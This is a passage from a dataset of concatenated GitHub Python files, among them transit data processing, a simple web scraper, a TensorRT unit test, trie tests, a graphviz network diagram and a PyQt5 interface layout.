]\ntraj=traj[['motionState_vehicle','motionState_time','motionState_speed','motionState_acceleration']]\ntraj=traj.sort_values(['motionState_vehicle','motionState_time'])\ntraj.rename(columns={'motionState_vehicle' : 'vehicle_id','motionState_time':'time','motionState_speed':'speed',\n 'motionState_acceleration':'acceleration'},inplace = True)\n# UNIT: time:milliseconds, speed:0.01m/s, acceleration:0.0001m/s^2\ntrajectory=pd.merge(traj, businfo, on='vehicle_id')\ntrajectory=trajectory.drop(['vehicle_id'],axis=1)\n#group dataframe into multiple dataframe as a dict by bus name\ntrajectory=dict(tuple(trajectory.groupby('vehicle_ref')))\n\n# date = '2021-08-20'\ntrip_asm = pd.read_csv('../Pre-processing/trip-assignments/trip-asm-{}.csv'.format(args.date))\n\ndef time_conv(x):\n h, m, s = x.split(':')\n return int(h) * 3600 + int(m) * 60 + 
int(s)\n\nstopO['gtfs_time'] = stopO['stopinfo_started'] - stopO['stopinfo_arrivalDelay'].apply(float)\n\nfinal_stopO = pd.DataFrame()\nfor veh_id in stopO['stopinfo_id'].unique():\n    df_stop_veh = stopO[stopO['stopinfo_id'] == veh_id]\n    trip_asm_veh = trip_asm[trip_asm['vid'] == int(veh_id)]\n    traj_veh = trajectory[str(veh_id)]\n    for idx, row in trip_asm_veh.iterrows():\n        df_stop_trip = df_stop_veh[(df_stop_veh['gtfs_time'] >= time_conv(row['gtfs_time_start'])) & \n                                   (df_stop_veh['gtfs_time'] < time_conv(row['gtfs_time_end']))]\n        df_stop_trip['trip_id'] = int(row['trip_id'])\n        final_stopO = pd.concat([final_stopO, df_stop_trip], ignore_index=True)\n        \n        actual_start_time, actual_end_time = df_stop_trip['stopinfo_started'].min(), df_stop_trip['stopinfo_started'].max()\n        traj_trip = traj_veh[(traj_veh['time'] >= actual_start_time*1000) & (traj_veh['time'] <= actual_end_time*1000)]\n        if len(traj_trip) > 0:\n            traj_trip.to_csv('./trip-level-output/trajectory_{}.csv'.format(row['trip_id']), index=None)\n        \nfinal_stopO.to_csv("./trip-level-output/busstop_info.csv",index=False)\n# write final stop output ","repo_name":"smarttransit-ai/transit-gym","sub_path":"background_traffic_elimination_v2/Post-processing/ouputProcess.py","file_name":"ouputProcess.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"6795883024","text":"# importing required modules \nfrom zipfile import ZipFile \nimport xmltodict, json\nimport os\n\n# specifying the zip file name \nfile_name = \"export-full-1556040614144.zip\"\n\nrootdir = os.path.dirname(os.path.realpath(__file__))\nfor subdir, dirs, files in os.walk(rootdir):\n\tfor file in files:\n\t\tif file.endswith(\"zip\"):\n\t\t\tfile_name = file\n\n # opening the zip file in READ mode \nwith ZipFile(file_name, 'r') as zip: \n    # extracting all the files \n    print('Extracting all the files now...') \n    zip.extractall() \n    print('Done!')\n\nmasterlist = []\nexception = 1\nsuccess = 1\nfor subdir, dirs, files in os.walk(rootdir):\n\tfor file in files:\n\t\tif file == \"metadata.xml\":\n\t\t\tdocument_file = open(os.path.join(subdir, file), \"r\") # Open a file in read-only mode\n\t\t\toriginal_doc = document_file.read() # read the file object\n\t\t\tdocument = xmltodict.parse(original_doc) # Parse the read document string\n\t\t\tstrdict = json.dumps(document)\n\t\t\td = json.loads(strdict)\n\t\t\tmasterlist.append(d)\n\n\nprint(masterlist[50])\nprint(len(masterlist))\n","repo_name":"maheenakbar/GLOS","sub_path":"metadata_test/metadata_zip_script.py","file_name":"metadata_zip_script.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10992070643","text":"import requests\nfrom lxml import etree\n\n# url='https://read.douban.com/kind/100'\nurl='http://www.yaobiaozhun.com/yd2015'\nr=requests.get(url)\n# r.encoding='utf-8'\n\ncontent=etree.HTML(r.content)\nfor box in content.xpath('//div[@class=\"cms_list\"]/table/tr[position()>1]'):\n    box.xpath('./td[1]/a/@href')  # lxml's xpath() already returns a list; .extract() is Scrapy's API and would raise AttributeError here\n\n\n\n# res=content.xpath('//div[@class=\"cms_list\"]/table/tr')\n# ur=content.xpath(\"//a[contains(text(),'下页')]/@href\")\n# page = 'http://www.yaobiaozhun.com/yd2015/' + ur[0]\n# print(page)\n\n# for i in range(2, 22):\n#     print(content.xpath('//div[@class=\"cms_list\"]/table/tr[%d]/td[1]/a/text()' % i))\n#     n=n+1\n#     print(n)\n# print(content.xpath('//div[@class=\"cms_list\"]/table/tbody/tr[2]/td[1]/a'))\n# 
print(content.xpath(\"/html/body/div/div[3]/div[3]/table/tbody/tr[2]/td[1]/a\"))\n# print(content.xpath('/html/body/div/div/article/div[2]/div[1]/ul/li[1]/div[2]/div[2]/a/text()'))\n# print(content.xpath('//ul[@class=\"list-lined ebook-list column-list\"]/li[1]/div[2]/div[2]/a/text()'))\n# open('/Users/shiyijie/Desktop/1.txt','w').write(result)\n# //*[@id=\"wrap\"]/div[3]/div[2]/div[3]/pre/center[1]","repo_name":"yijieshi/ScrapySpider","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1632315047","text":"from PIL import Image, ImageDraw,ImageFont\r\nimport cv2\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom PIL import Image, ImageTk\r\nroot = Tk()\r\n\r\nroot.filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select A file\",\r\n filetypes=((\"png files\", \".png\"),\r\n (\"jpg files\", \"jpg\"),\r\n (\"all files\", \".\")))\r\nmy_label = Label(root, text=root.filename).pack()\r\nupload_img = ImageTk.PhotoImage(Image.open(root.filename))\r\nupload_img_label = Label(image=upload_img).pack()\r\n\r\nroot.mainloop()\r\n\r\nimage = Image.open(root.filename)\r\nfont1 = ImageFont.truetype(\"arial.ttf\",20)\r\ndraw = ImageDraw.Draw(image)\r\npoints1 = 000,000\r\npoints2 = 00,30\r\nprint(\"enter the name and age of person\")\r\nname = input()\r\n\r\nprint(\"enter the age of person\")\r\nage = input()\r\n\r\ndraw.text(points1,name,\"white\",font=font1)\r\n\r\ndraw.text(points2,age,\"white\",font=font1)\r\nimage.show()\r\n\r\n","repo_name":"Aishu11-bij/WaterMark","sub_path":"textmark.py","file_name":"textmark.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3811088685","text":"import unittest\nfrom functools import partial\n\nimport numpy as np\nfrom program_config import ProgramConfig, TensorConfig\nfrom trt_layer_auto_scan_test import TrtLayerAutoScanTest\n\nimport paddle.inference as paddle_infer\n\n\nclass TrtConvertSetValue(TrtLayerAutoScanTest):\n def is_program_valid(self, program_config: ProgramConfig) -> bool:\n return True\n\n def sample_program_configs(self):\n def generate_input1():\n return np.random.random([2, 3, 3]).astype(np.float32)\n\n def generate_input2():\n return np.random.random([2, 2, 3]).astype(np.float32)\n\n for update_scalar in [True, False]:\n self.update_scalar = update_scalar\n set_value_inputs = {}\n if update_scalar:\n set_value_inputs = {\n \"Input\": [\"input_data\"],\n }\n else:\n set_value_inputs = {\n \"Input\": [\"input_data\"],\n \"ValueTensor\": [\"update_data\"],\n }\n ops_config = [\n {\n \"op_type\": \"set_value\",\n \"op_inputs\": set_value_inputs,\n \"op_outputs\": {\"Out\": [\"input_data\"]},\n \"op_attrs\": {\n \"axes\": [1],\n \"starts\": [0],\n \"ends\": [2],\n \"steps\": [1],\n \"decrease_axes\": [],\n \"values\": [0.0],\n },\n },\n {\n \"op_type\": \"relu\",\n \"op_inputs\": {\n \"X\": [\"input_data\"],\n },\n \"op_outputs\": {\"Out\": [\"output_data\"]},\n \"op_attrs\": {},\n },\n ]\n\n ops = self.generate_op_config(ops_config)\n if update_scalar:\n program_config = ProgramConfig(\n ops=ops,\n weights={},\n inputs={\n \"input_data\": TensorConfig(\n data_gen=partial(generate_input1)\n ),\n },\n outputs=[\"output_data\"],\n )\n else:\n program_config = ProgramConfig(\n ops=ops,\n weights={},\n inputs={\n \"input_data\": TensorConfig(\n 
data_gen=partial(generate_input1)\n ),\n \"update_data\": TensorConfig(\n data_gen=partial(generate_input2)\n ),\n },\n outputs=[\"output_data\"],\n )\n\n yield program_config\n\n def sample_predictor_configs(self, program_config):\n def generate_dynamic_shape(attrs):\n if self.update_scalar:\n self.dynamic_shape.min_input_shape = {\n \"input_data\": [2, 3, 3],\n }\n self.dynamic_shape.max_input_shape = {\n \"input_data\": [3, 3, 4],\n }\n self.dynamic_shape.opt_input_shape = {\n \"input_data\": [3, 3, 3],\n }\n else:\n self.dynamic_shape.min_input_shape = {\n \"input_data\": [2, 3, 3],\n \"update_data\": [2, 2, 3],\n }\n self.dynamic_shape.max_input_shape = {\n \"input_data\": [3, 3, 4],\n \"update_data\": [3, 2, 4],\n }\n self.dynamic_shape.opt_input_shape = {\n \"input_data\": [3, 3, 3],\n \"update_data\": [3, 2, 3],\n }\n\n def clear_dynamic_shape():\n self.dynamic_shape.max_input_shape = {}\n self.dynamic_shape.min_input_shape = {}\n self.dynamic_shape.opt_input_shape = {}\n\n def generate_trt_nodes_num(attrs, dynamic_shape):\n if dynamic_shape:\n ver = paddle_infer.get_trt_compile_version()\n if self.update_scalar:\n if ver[0] * 1000 + ver[1] * 100 + ver[2] * 10 < 8200:\n return 1, 3\n return 1, 2\n else:\n if ver[0] * 1000 + ver[1] * 100 + ver[2] * 10 < 8200:\n return 1, 4\n return 1, 3\n\n attrs = [\n program_config.ops[i].attrs for i in range(len(program_config.ops))\n ]\n\n generate_dynamic_shape(attrs)\n self.trt_param.precision = paddle_infer.PrecisionType.Float32\n program_config.set_input_type(np.float32)\n self.trt_param.workspace_size = 2013265920\n yield self.create_inference_config(), generate_trt_nodes_num(\n attrs, True\n ), (1e-5, 1e-4)\n\n def test(self):\n self.run_test()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"chen2016013/Paddle","sub_path":"test/ir/inference/test_trt_convert_set_value.py","file_name":"test_trt_convert_set_value.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"15685509888","text":"import torch.nn as nn\nimport torch as t\nfrom utils import get_frames,process_frames, SpeedDataset, split_data, get_targets\nfrom model import get_nvidia_model\nimport sys\n\n\ndef train(model, training_generator, device):\n print(\"Start training\")\n epochs = 5\n criterion = nn.MSELoss()\n optimizer = t.optim.Adam(model.parameters(), lr=0.001)\n for epoch in range(epochs):\n running_loss = 0.0\n for i, data in enumerate(training_generator, 0):\n inputs, labels = data\n inputs, labels = inputs.to(device), labels.to(device)\n\n optimizer.zero_grad()\n\n outputs = model(inputs)\n labels = labels.float()\n outputs = outputs.flatten()\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n if i % 200 == 199:\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 200))\n running_loss = 0.0\n\n print('finished training')\n return\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 3:\n sys.exit(\"Improper number of args\")\n\n train_path = sys.argv[1]\n #test_path = '/Users/pallekc/Jobs/comma/speed_challenge_2017/data/test.mp4'\n train_targets = sys.argv[2]\n\n model = get_nvidia_model()\n if t.cuda.is_available():\n model.cuda()\n device = t.device(\"cuda:0\" if t.cuda.is_available() else \"cpu\")\n print('device ',device)\n train_frames, train_frames_count = get_frames(train_path)\n train_targets, train_targets_count = get_targets(train_targets)\n assert train_frames_count == 
train_targets_count, 'Number of train frames != targets'\n\n train_processed = process_frames(train_frames, train_targets) # remember the first one is missing\n train_x, train_y, test_x, test_y = split_data(train_processed)\n\n train_dataset = SpeedDataset(train_x, train_y)\n training_generator = t.utils.data.DataLoader(train_dataset, batch_size=8, shuffle=True)\n\n # train_x, train_y, val_x, val_y = split_data(train_x, train_y)\n # val_dataset = SpeedDataset(val_x, val_y)\n # val_generator = t.utils.data.DataLoader(val_dataset, batch_size=8, shuffle=True)\n\n train(model, training_generator, device)\n","repo_name":"pallekc91/SpeedChallenge2017","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26410728311","text":"# A showcase of different types of loops.\n\nprint (\"Example of a while loop counting backwards.\")\n\ni = 20\n\nwhile i > 0:\n print (i)\n i = i - 1\n\nprint (\"Printing even numbers from 1-20.\")\n\ni = 20\n\nfor i in range (0, i+2):\n\tif i % 2 == 0:\n\t\tprint (i)\n\nprint (\"Asterisk chain loop\")\n\nstars = \"*****\"\nfor i in range(0 ,5):\n index = i + 1\n print (stars[0:index])\n\nprint (\"Highest common denominator between two positive integers, where x = 24 and y = 60.\")\n\nimport math\n\nx = 24\ny = 60\n\nprint (math.gcd(x, y))","repo_name":"Asterisk555/HyperionDev","sub_path":"T10 - For Loop/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24826791751","text":"import graphviz as gv\n\n__author__ = 'danidee'\n\n\nclass DrawGraph:\n\n\n \"\"\"\n This class handles the generation of datatypes(lists) to enable graphviz\n draw the graphs of the activities using activities on nodes\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def generate_paths(unordered):\n \"\"\"\n This method gets all the paths in the project appends Start and Finish to them and then splits them into\n sublists of graph edges e.g [[A, B, C]] becomes [[[Start, A]], [[A, B]], [[B, C]], [[C, Finish]]]\n they're nested this way because label_graph will append a dictionary containing properties that style the\n directed graph when passed to graphviz, in this method we're still working with pure Activity objects, they've\n not been substitued with their id's\n :param unordered: List of all possible paths in the project\n :return: Nested Sublist of graph edges e.g [[A, B, C]] becomes [[[Start, A]], [[A, B]], [[B, C]], [[C, Finish]]]\n \"\"\"\n paths = [[activity for activity in path] for path in unordered]\n\n graph_path = list()\n for b in paths:\n b.insert(0, 'Start')\n b.append('Finish')\n for c in zip(b, b[1:]):\n ind_lists = [list(c)]\n graph_path.append(ind_lists)\n\n print(graph_path)\n return graph_path\n\n @staticmethod\n def label_graph(graph_path):\n \"\"\"\n This method styles the graph by adding a dictionary to each edge in graph_path, this attributes of the\n dictionary tell graphviz how to style our graph\n :param graph_path: nested sublists of edges in the graph\n :return: nested sublists where each activity has been substituted with it's id (so graphviz can draw)\n \"\"\"\n for a in graph_path:\n a.append({})\n\n # if the first element == Start it will fail to get a duration and throw an AttributeError, if so set the\n # duration as 0\n try:\n duration = a[0][0].duration\n except AttributeError:\n 
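# 'Start' is a plain string with no duration attribute, so the first edge out of Start gets a zero label\n                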
a[1].update({'label': str(0)})\n\n                # if the first activity after Start is a critical activity, update the graph line to red\n                if a[0][1].is_critical:\n                    a[1].update({'color': 'red'})\n                continue\n\n            duration = int(duration) if duration % 1 == 0.0 else duration\n            a[1].update({'label': str(duration)})\n\n            # if the first activity is critical and the second activity is also critical, update the graph line to red\n            if a[0][0].is_critical and getattr(a[0][1], 'is_critical', False):\n                a[1].update({'color': 'red'})\n\n            # if the first activity is critical and we're at the end of the graph ('Finish'), update the graph line to red\n            elif a[0][0].is_critical and a[0][1] == 'Finish':\n                a[1].update({'color': 'red'})\n\n        graph_path = [[[b.id if hasattr(b, 'id') else b for b in a[0]], a[1]] for a in graph_path]\n\n        return graph_path\n\n    @staticmethod\n    def add_edges(graph, edges):\n        \"\"\"\n        Method that loops through the list of edges and adds the edges and their properties to the graph\n        :param graph: graphviz graph\n        :param edges: Nested sublists of graph edges (represented by their id's, not pure Activity objects)\n        :return:\n        \"\"\"\n        for e in edges:\n            if isinstance(e[0], list):\n                graph.edge(*e[0], **e[1])\n            else:\n                graph.edge(*e)\n        return graph\n\n    def draw(self, all_paths):\n        \"\"\"\n        :param all_paths: all the possible paths in the project\n        :return: None\n        \"\"\"\n\n        graph = gv.Digraph(format='png')\n        graph._head = 'strict digraph %s{' # i should not be doing this\n        graph.node_attr['shape'] = 'circle'\n        graph.graph_attr['rankdir'] = 'LR'\n        unlabelled_edges = self.generate_paths(all_paths)\n        labelled_edges = self.label_graph(unlabelled_edges)\n        print(labelled_edges)\n        graphviz_path = self.add_edges(graph, labelled_edges)\n        graphviz_path.render('graphs/network_diagram')\n\nif __name__ == '__main__':\n    # no main() is defined in this module, so there is nothing to run directly;\n    # import DrawGraph and call draw(all_paths) from the application instead\n    pass\n","repo_name":"danidee10/Maven","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39596901119","text":"import unittest\nimport trie_methods\nimport graph\nimport trie_builder\n\n\nclass test_method_is_gen(unittest.TestCase):\n    # Input: string. 
Output: true / false\n # Cases: not a string : type error\n # dna : true\n # not dna : false\n\n def test_not_string(self):\n s = None\n with self.assertRaises(TypeError):\n trie_methods.is_gen(s)\n\n def test_true(self):\n s = 'cga'\n val = trie_methods.is_gen(s)\n self.assertTrue(val)\n\n def test_false(self):\n s = 'tge'\n val = trie_methods.is_gen(s)\n self.assertFalse(val)\n\n\nclass test_method_name(unittest.TestCase):\n # Output: random string of six characters\n def test_normal(self):\n s = trie_methods.name()\n self.assertIsInstance(s, str)\n self.assertEqual(len(s), 6)\n\n\nclass test_method_edge_exists(unittest.TestCase):\n # input: s, x, trie; output: true/false\n def test_method_true(self):\n s = 'c'\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'c')\n val = trie_methods.edge_exists(s, x, trie)\n self.assertTrue(val)\n\n def test_method_false(self):\n s = 'c'\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.edge('f', 'A', 'B', 'g')\n trie.edge('g', 'A', 'C', 't')\n\n val = trie_methods.edge_exists(s, x, trie)\n self.assertFalse(val)\n\n\nclass test_method_select(unittest.TestCase):\n def test_method_normal(self):\n s = 'c'\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.node('D')\n trie.node('E')\n trie.edge('f', 'A', 'B', 'a')\n trie.edge('g', 'A', 'C', 'c')\n trie.edge('h', 'A', 'D', 'g')\n trie.edge('i', 'B', 'E', 'c')\n e = trie_methods.select(s, x, trie)\n self.assertEqual(e, 'g')\n\n\nclass test_method_root(unittest.TestCase):\n # Input: trie Output: node\n # Cases where this could go wrong?\n def test_method_normal(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.node('D')\n trie.node('E')\n trie.edge('f', 'A', 'B', 'a')\n trie.edge('g', 'A', 'C', 'c')\n trie.edge('h', 'B', 'D', 'a')\n trie.edge('i', 'C', 'E', 'g')\n r = trie_methods.root(trie)\n self.assertEqual(r, 'A')\n\n def test_single_node(self):\n trie = graph.Graph()\n trie.node('A')\n r = trie_methods.root(trie)\n self.assertEqual(r, 'A')\n\n def test_empty_trie(self):\n trie = graph.Graph()\n with self.assertRaises(ValueError):\n trie_methods.root(trie)\n\n def test_wrong_input(self):\n trie = None\n with self.assertRaises(TypeError):\n trie_methods.root(trie)\n\n\nclass test_method_trie_equivalence(unittest.TestCase):\n # Input: trie1, trie2. Output: true / false\n def test_normal(self):\n p1 = ['ag', 'ct', 'tt']\n p2 = ['tt', 'ct', 'ag']\n tr1 = trie_builder.PrefixTrieConstruction(p1)\n tr2 = trie_builder.PrefixTrieConstruction(p2)\n val = trie_methods.trie_equivalence(tr1, tr2)\n self.assertTrue(val)\n\n\nclass test_method_num_leaves(unittest.TestCase):\n # input: trie. 
output: int\n # Cases: single node : 1\n # two branches: 2\n # three complicated branches: 3\n\n def test_method_single(self):\n trie = graph.Graph()\n trie.node('A')\n val = trie_methods.num_leaves(trie)\n self.assertEqual(val, 1)\n\n def test_method_double(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'g')\n val = trie_methods.num_leaves(trie)\n self.assertEqual(val, 1)\n\n def test_method_complex(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'g')\n trie.node('C')\n trie.node('D')\n trie.node('E')\n trie.edge('g', 'B', 'C', 't')\n trie.edge('h', 'B', 'D', 'a')\n trie.edge('i', 'A', 'E', 'c')\n val = trie_methods.num_leaves(trie)\n self.assertEqual(val, 3)\n\n\nclass test_method_arrived(unittest.TestCase):\n def test_normal(self):\n x = 'B'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'c')\n val = trie_methods.arrived(x, trie)\n self.assertTrue(val)\n\n def test_false(self):\n x = 'A'\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.edge('f', 'A', 'B', 'c')\n val = trie_methods.arrived(x, trie)\n self.assertFalse(val)\n\n\nclass test_method_num_edges(unittest.TestCase):\n def test_normal(self):\n trie = graph.Graph()\n trie.node('A')\n trie.node('B')\n trie.node('C')\n trie.edge('f', 'A', 'B', 'c')\n trie.edge('g', 'A', 'C', 't')\n\n val = trie_methods.num_edges(trie)\n self.assertEqual(val, 2)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"juliushamilton/match_loc","sub_path":"test_trie_methods.py","file_name":"test_trie_methods.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16101246758","text":"from question_model import Question\nfrom data import question_data\nfrom quiz_brain import QuizBrain\n\nquestion_bank = []\nfor question in question_data:\n question_bank.append(Question(question['question'], question['correct_answer']))\n\nqb = QuizBrain(question_bank)\n\nwhile qb.still_has_question():\n qb.input()\n\nprint(\"You've completed the quiz.\")\nprint(f\"The final score is {qb.get_score()}/{qb.get_q_num()}.\")","repo_name":"jcongmon/python100DOC","sub_path":"Day 17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32059262947","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport styles\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1035, 690)\n MainWindow.setStyleSheet(styles.only_background)\n\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1040, 670))\n self.tabWidget.setStyleSheet(styles.only_background)\n self.tabWidget.setObjectName(\"tabWidget\")\n\n self.scripts = QtWidgets.QWidget()\n self.scripts.setObjectName(\"scripts\")\n\n self.all_scenes = QtWidgets.QLabel(self.scripts)\n self.all_scenes.setGeometry(QtCore.QRect(30, 10, 120, 30))\n self.all_scenes.setFont(styles.font_for_labels)\n self.all_scenes.setStyleSheet(styles.color_labels)\n self.all_scenes.setObjectName(\"all_scenes\")\n\n self.list = QtWidgets.QListWidget(self.scripts)\n self.list.setGeometry(QtCore.QRect(20, 50, 400, 570))\n 
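# QRect arguments are x, y, width, height in pixels\n        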
self.list.setFont(styles.font_list)\n self.list.setStyleSheet(styles.for_list)\n self.list.setObjectName(\"list\")\n\n self.add = QtWidgets.QPushButton(self.scripts)\n self.add.setGeometry(QtCore.QRect(310, 10, 110, 30))\n self.add.setFont(styles.font_big_btn)\n self.add.setMouseTracking(False)\n self.add.setStyleSheet(styles.for_orange_btn)\n self.add.setCheckable(False)\n self.add.setObjectName(\"add\")\n\n self.frame = QtWidgets.QFrame(self.scripts)\n self.frame.setVisible(False)\n self.frame.setGeometry(QtCore.QRect(450, 10, 570, 620))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n\n self.name = QtWidgets.QLineEdit(self.frame)\n self.name.setPlaceholderText(\"Название скрипта\")\n self.name.setGeometry(QtCore.QRect(10, 50, 370, 35))\n self.name.setFont(styles.default_font)\n self.name.setStyleSheet(styles.for_line_edit)\n self.name.setAlignment(QtCore.Qt.AlignCenter)\n self.name.setObjectName(\"name\")\n\n self.add_scene = QtWidgets.QLabel(self.frame)\n self.add_scene.setGeometry(QtCore.QRect(10, 10, 200, 30))\n self.add_scene.setFont(styles.font_for_labels)\n self.add_scene.setStyleSheet(styles.color_labels)\n self.add_scene.setObjectName(\"add_scene\")\n\n self.add_act = QtWidgets.QPushButton(self.frame)\n self.add_act.setGeometry(QtCore.QRect(10, 330, 120, 30))\n self.add_act.setFont(styles.font_ltl_btn)\n self.add_act.setMouseTracking(False)\n self.add_act.setStyleSheet(styles.for_btn)\n self.add_act.setCheckable(False)\n self.add_act.setObjectName(\"add_act\")\n\n self.check = QtWidgets.QComboBox(self.frame)\n self.check.setGeometry(QtCore.QRect(140, 223, 111, 31))\n self.check.setFont(styles.default_font)\n self.check.setMouseTracking(False)\n self.check.setStyleSheet(styles.for_combobox)\n self.check.setObjectName(\"check\")\n\n self.add_act_res = QtWidgets.QPushButton(self.frame)\n self.add_act_res.setGeometry(QtCore.QRect(20, 223, 111, 31))\n self.add_act_res.setVisible(False)\n self.add_act_res.setText('Добавить')\n self.add_act_res.setFont(styles.font_ltl_btn)\n self.add_act_res.setMouseTracking(False)\n self.add_act_res.setStyleSheet(styles.for_orange_btn)\n self.add_act_res.setCheckable(False)\n self.add_act_res.setObjectName(\"add_act\")\n\n self.add_bf = QtWidgets.QPushButton(self.frame)\n self.add_bf.setGeometry(QtCore.QRect(20, 223, 111, 31))\n self.add_bf.setVisible(False)\n self.add_bf.setText('Добавить перед')\n self.add_bf.setFont(styles.font_ltl_btn)\n self.add_bf.setMouseTracking(False)\n self.add_bf.setStyleSheet(styles.for_orange_btn)\n self.add_bf.setCheckable(False)\n self.add_bf.setObjectName(\"add_act\")\n\n self.save_act = QtWidgets.QPushButton(self.frame)\n self.save_act.setGeometry(QtCore.QRect(20, 223, 111, 31))\n self.save_act.setVisible(False)\n self.save_act.setText('Сохранить')\n self.save_act.setFont(styles.font_ltl_btn)\n self.save_act.setMouseTracking(False)\n self.save_act.setStyleSheet(styles.for_orange_btn)\n self.save_act.setCheckable(False)\n self.save_act.setObjectName(\"save_act\")\n\n self.actions = QtWidgets.QTextBrowser(self.frame)\n self.actions.setPlaceholderText('Тут будет содержимое сценария')\n self.actions.setGeometry(QtCore.QRect(10, 90, 510, 230))\n self.actions.setFont(styles.default_font)\n self.actions.setStyleSheet(styles.for_actions)\n self.actions.setObjectName(\"actions\")\n\n self.save = QtWidgets.QPushButton(self.frame)\n self.save.setGeometry(QtCore.QRect(340, 5, 101, 30))\n self.save.setText('Сохранить')\n 
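# Russian UI captions: 'Сохранить' = 'Save', 'Отменить' = 'Cancel', 'Удалить' = 'Delete', 'Изменить' = 'Edit'\n        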
self.save.setFont(styles.font_big_btn)\n self.save.setMouseTracking(False)\n self.save.setStyleSheet(styles.for_orange_btn)\n self.save.setCheckable(False)\n self.save.setObjectName(\"save\")\n\n self.cancel_script = QtWidgets.QPushButton(self.frame)\n self.cancel_script.setGeometry(QtCore.QRect(260, 5, 75, 30))\n self.cancel_script.setText('Отменить')\n self.cancel_script.setFont(styles.font_ltl_btn)\n self.cancel_script.setMouseTracking(False)\n self.cancel_script.setStyleSheet(styles.for_btn)\n self.cancel_script.setCheckable(False)\n self.cancel_script.setObjectName(\"cancel_script\")\n\n self.del_script = QtWidgets.QPushButton(self.frame)\n self.del_script.setGeometry(QtCore.QRect(260, 5, 75, 30))\n self.del_script.setText('Удалить')\n self.del_script.setFont(styles.font_ltl_btn)\n self.del_script.setMouseTracking(False)\n self.del_script.setStyleSheet(styles.for_btn)\n self.del_script.setCheckable(False)\n self.del_script.setVisible(False)\n self.del_script.setObjectName(\"del_script\")\n\n self.edit = QtWidgets.QPushButton(self.frame)\n self.edit.setGeometry(QtCore.QRect(340, 5, 101, 30))\n self.edit.setText('Изменить')\n self.edit.setVisible(False)\n self.edit.setFont(styles.font_big_btn)\n self.edit.setMouseTracking(False)\n self.edit.setStyleSheet(styles.for_orange_btn)\n self.edit.setCheckable(False)\n self.edit.setObjectName(\"edit\")\n\n self.save_edit = QtWidgets.QPushButton(self.frame)\n self.save_edit.setGeometry(QtCore.QRect(340, 5, 101, 30))\n self.save_edit.setText('Сохранить')\n self.save_edit.setFont(styles.font_big_btn)\n self.save_edit.setMouseTracking(False)\n self.save_edit.setStyleSheet(styles.for_orange_btn)\n self.save_edit.setCheckable(False)\n self.save_edit.setObjectName(\"save_edit\")\n self.save_edit.setVisible(False)\n\n self.frame_2 = QtWidgets.QFrame(self.frame)\n self.frame_2.setVisible(False)\n self.frame_2.setGeometry(QtCore.QRect(19, 259, 421, 171))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n\n self.cancel = QtWidgets.QPushButton(self.frame)\n self.cancel.setGeometry(QtCore.QRect(330, 223, 111, 31))\n self.cancel.setFont(styles.font_ltl_btn)\n self.cancel.setText('Отменить')\n self.cancel.setMouseTracking(False)\n self.cancel.setStyleSheet(styles.for_btn)\n self.cancel.setCheckable(False)\n self.cancel.setObjectName(\"сancel\")\n self.cancel.setVisible(False)\n\n self.delete_act = QtWidgets.QPushButton(self.frame)\n 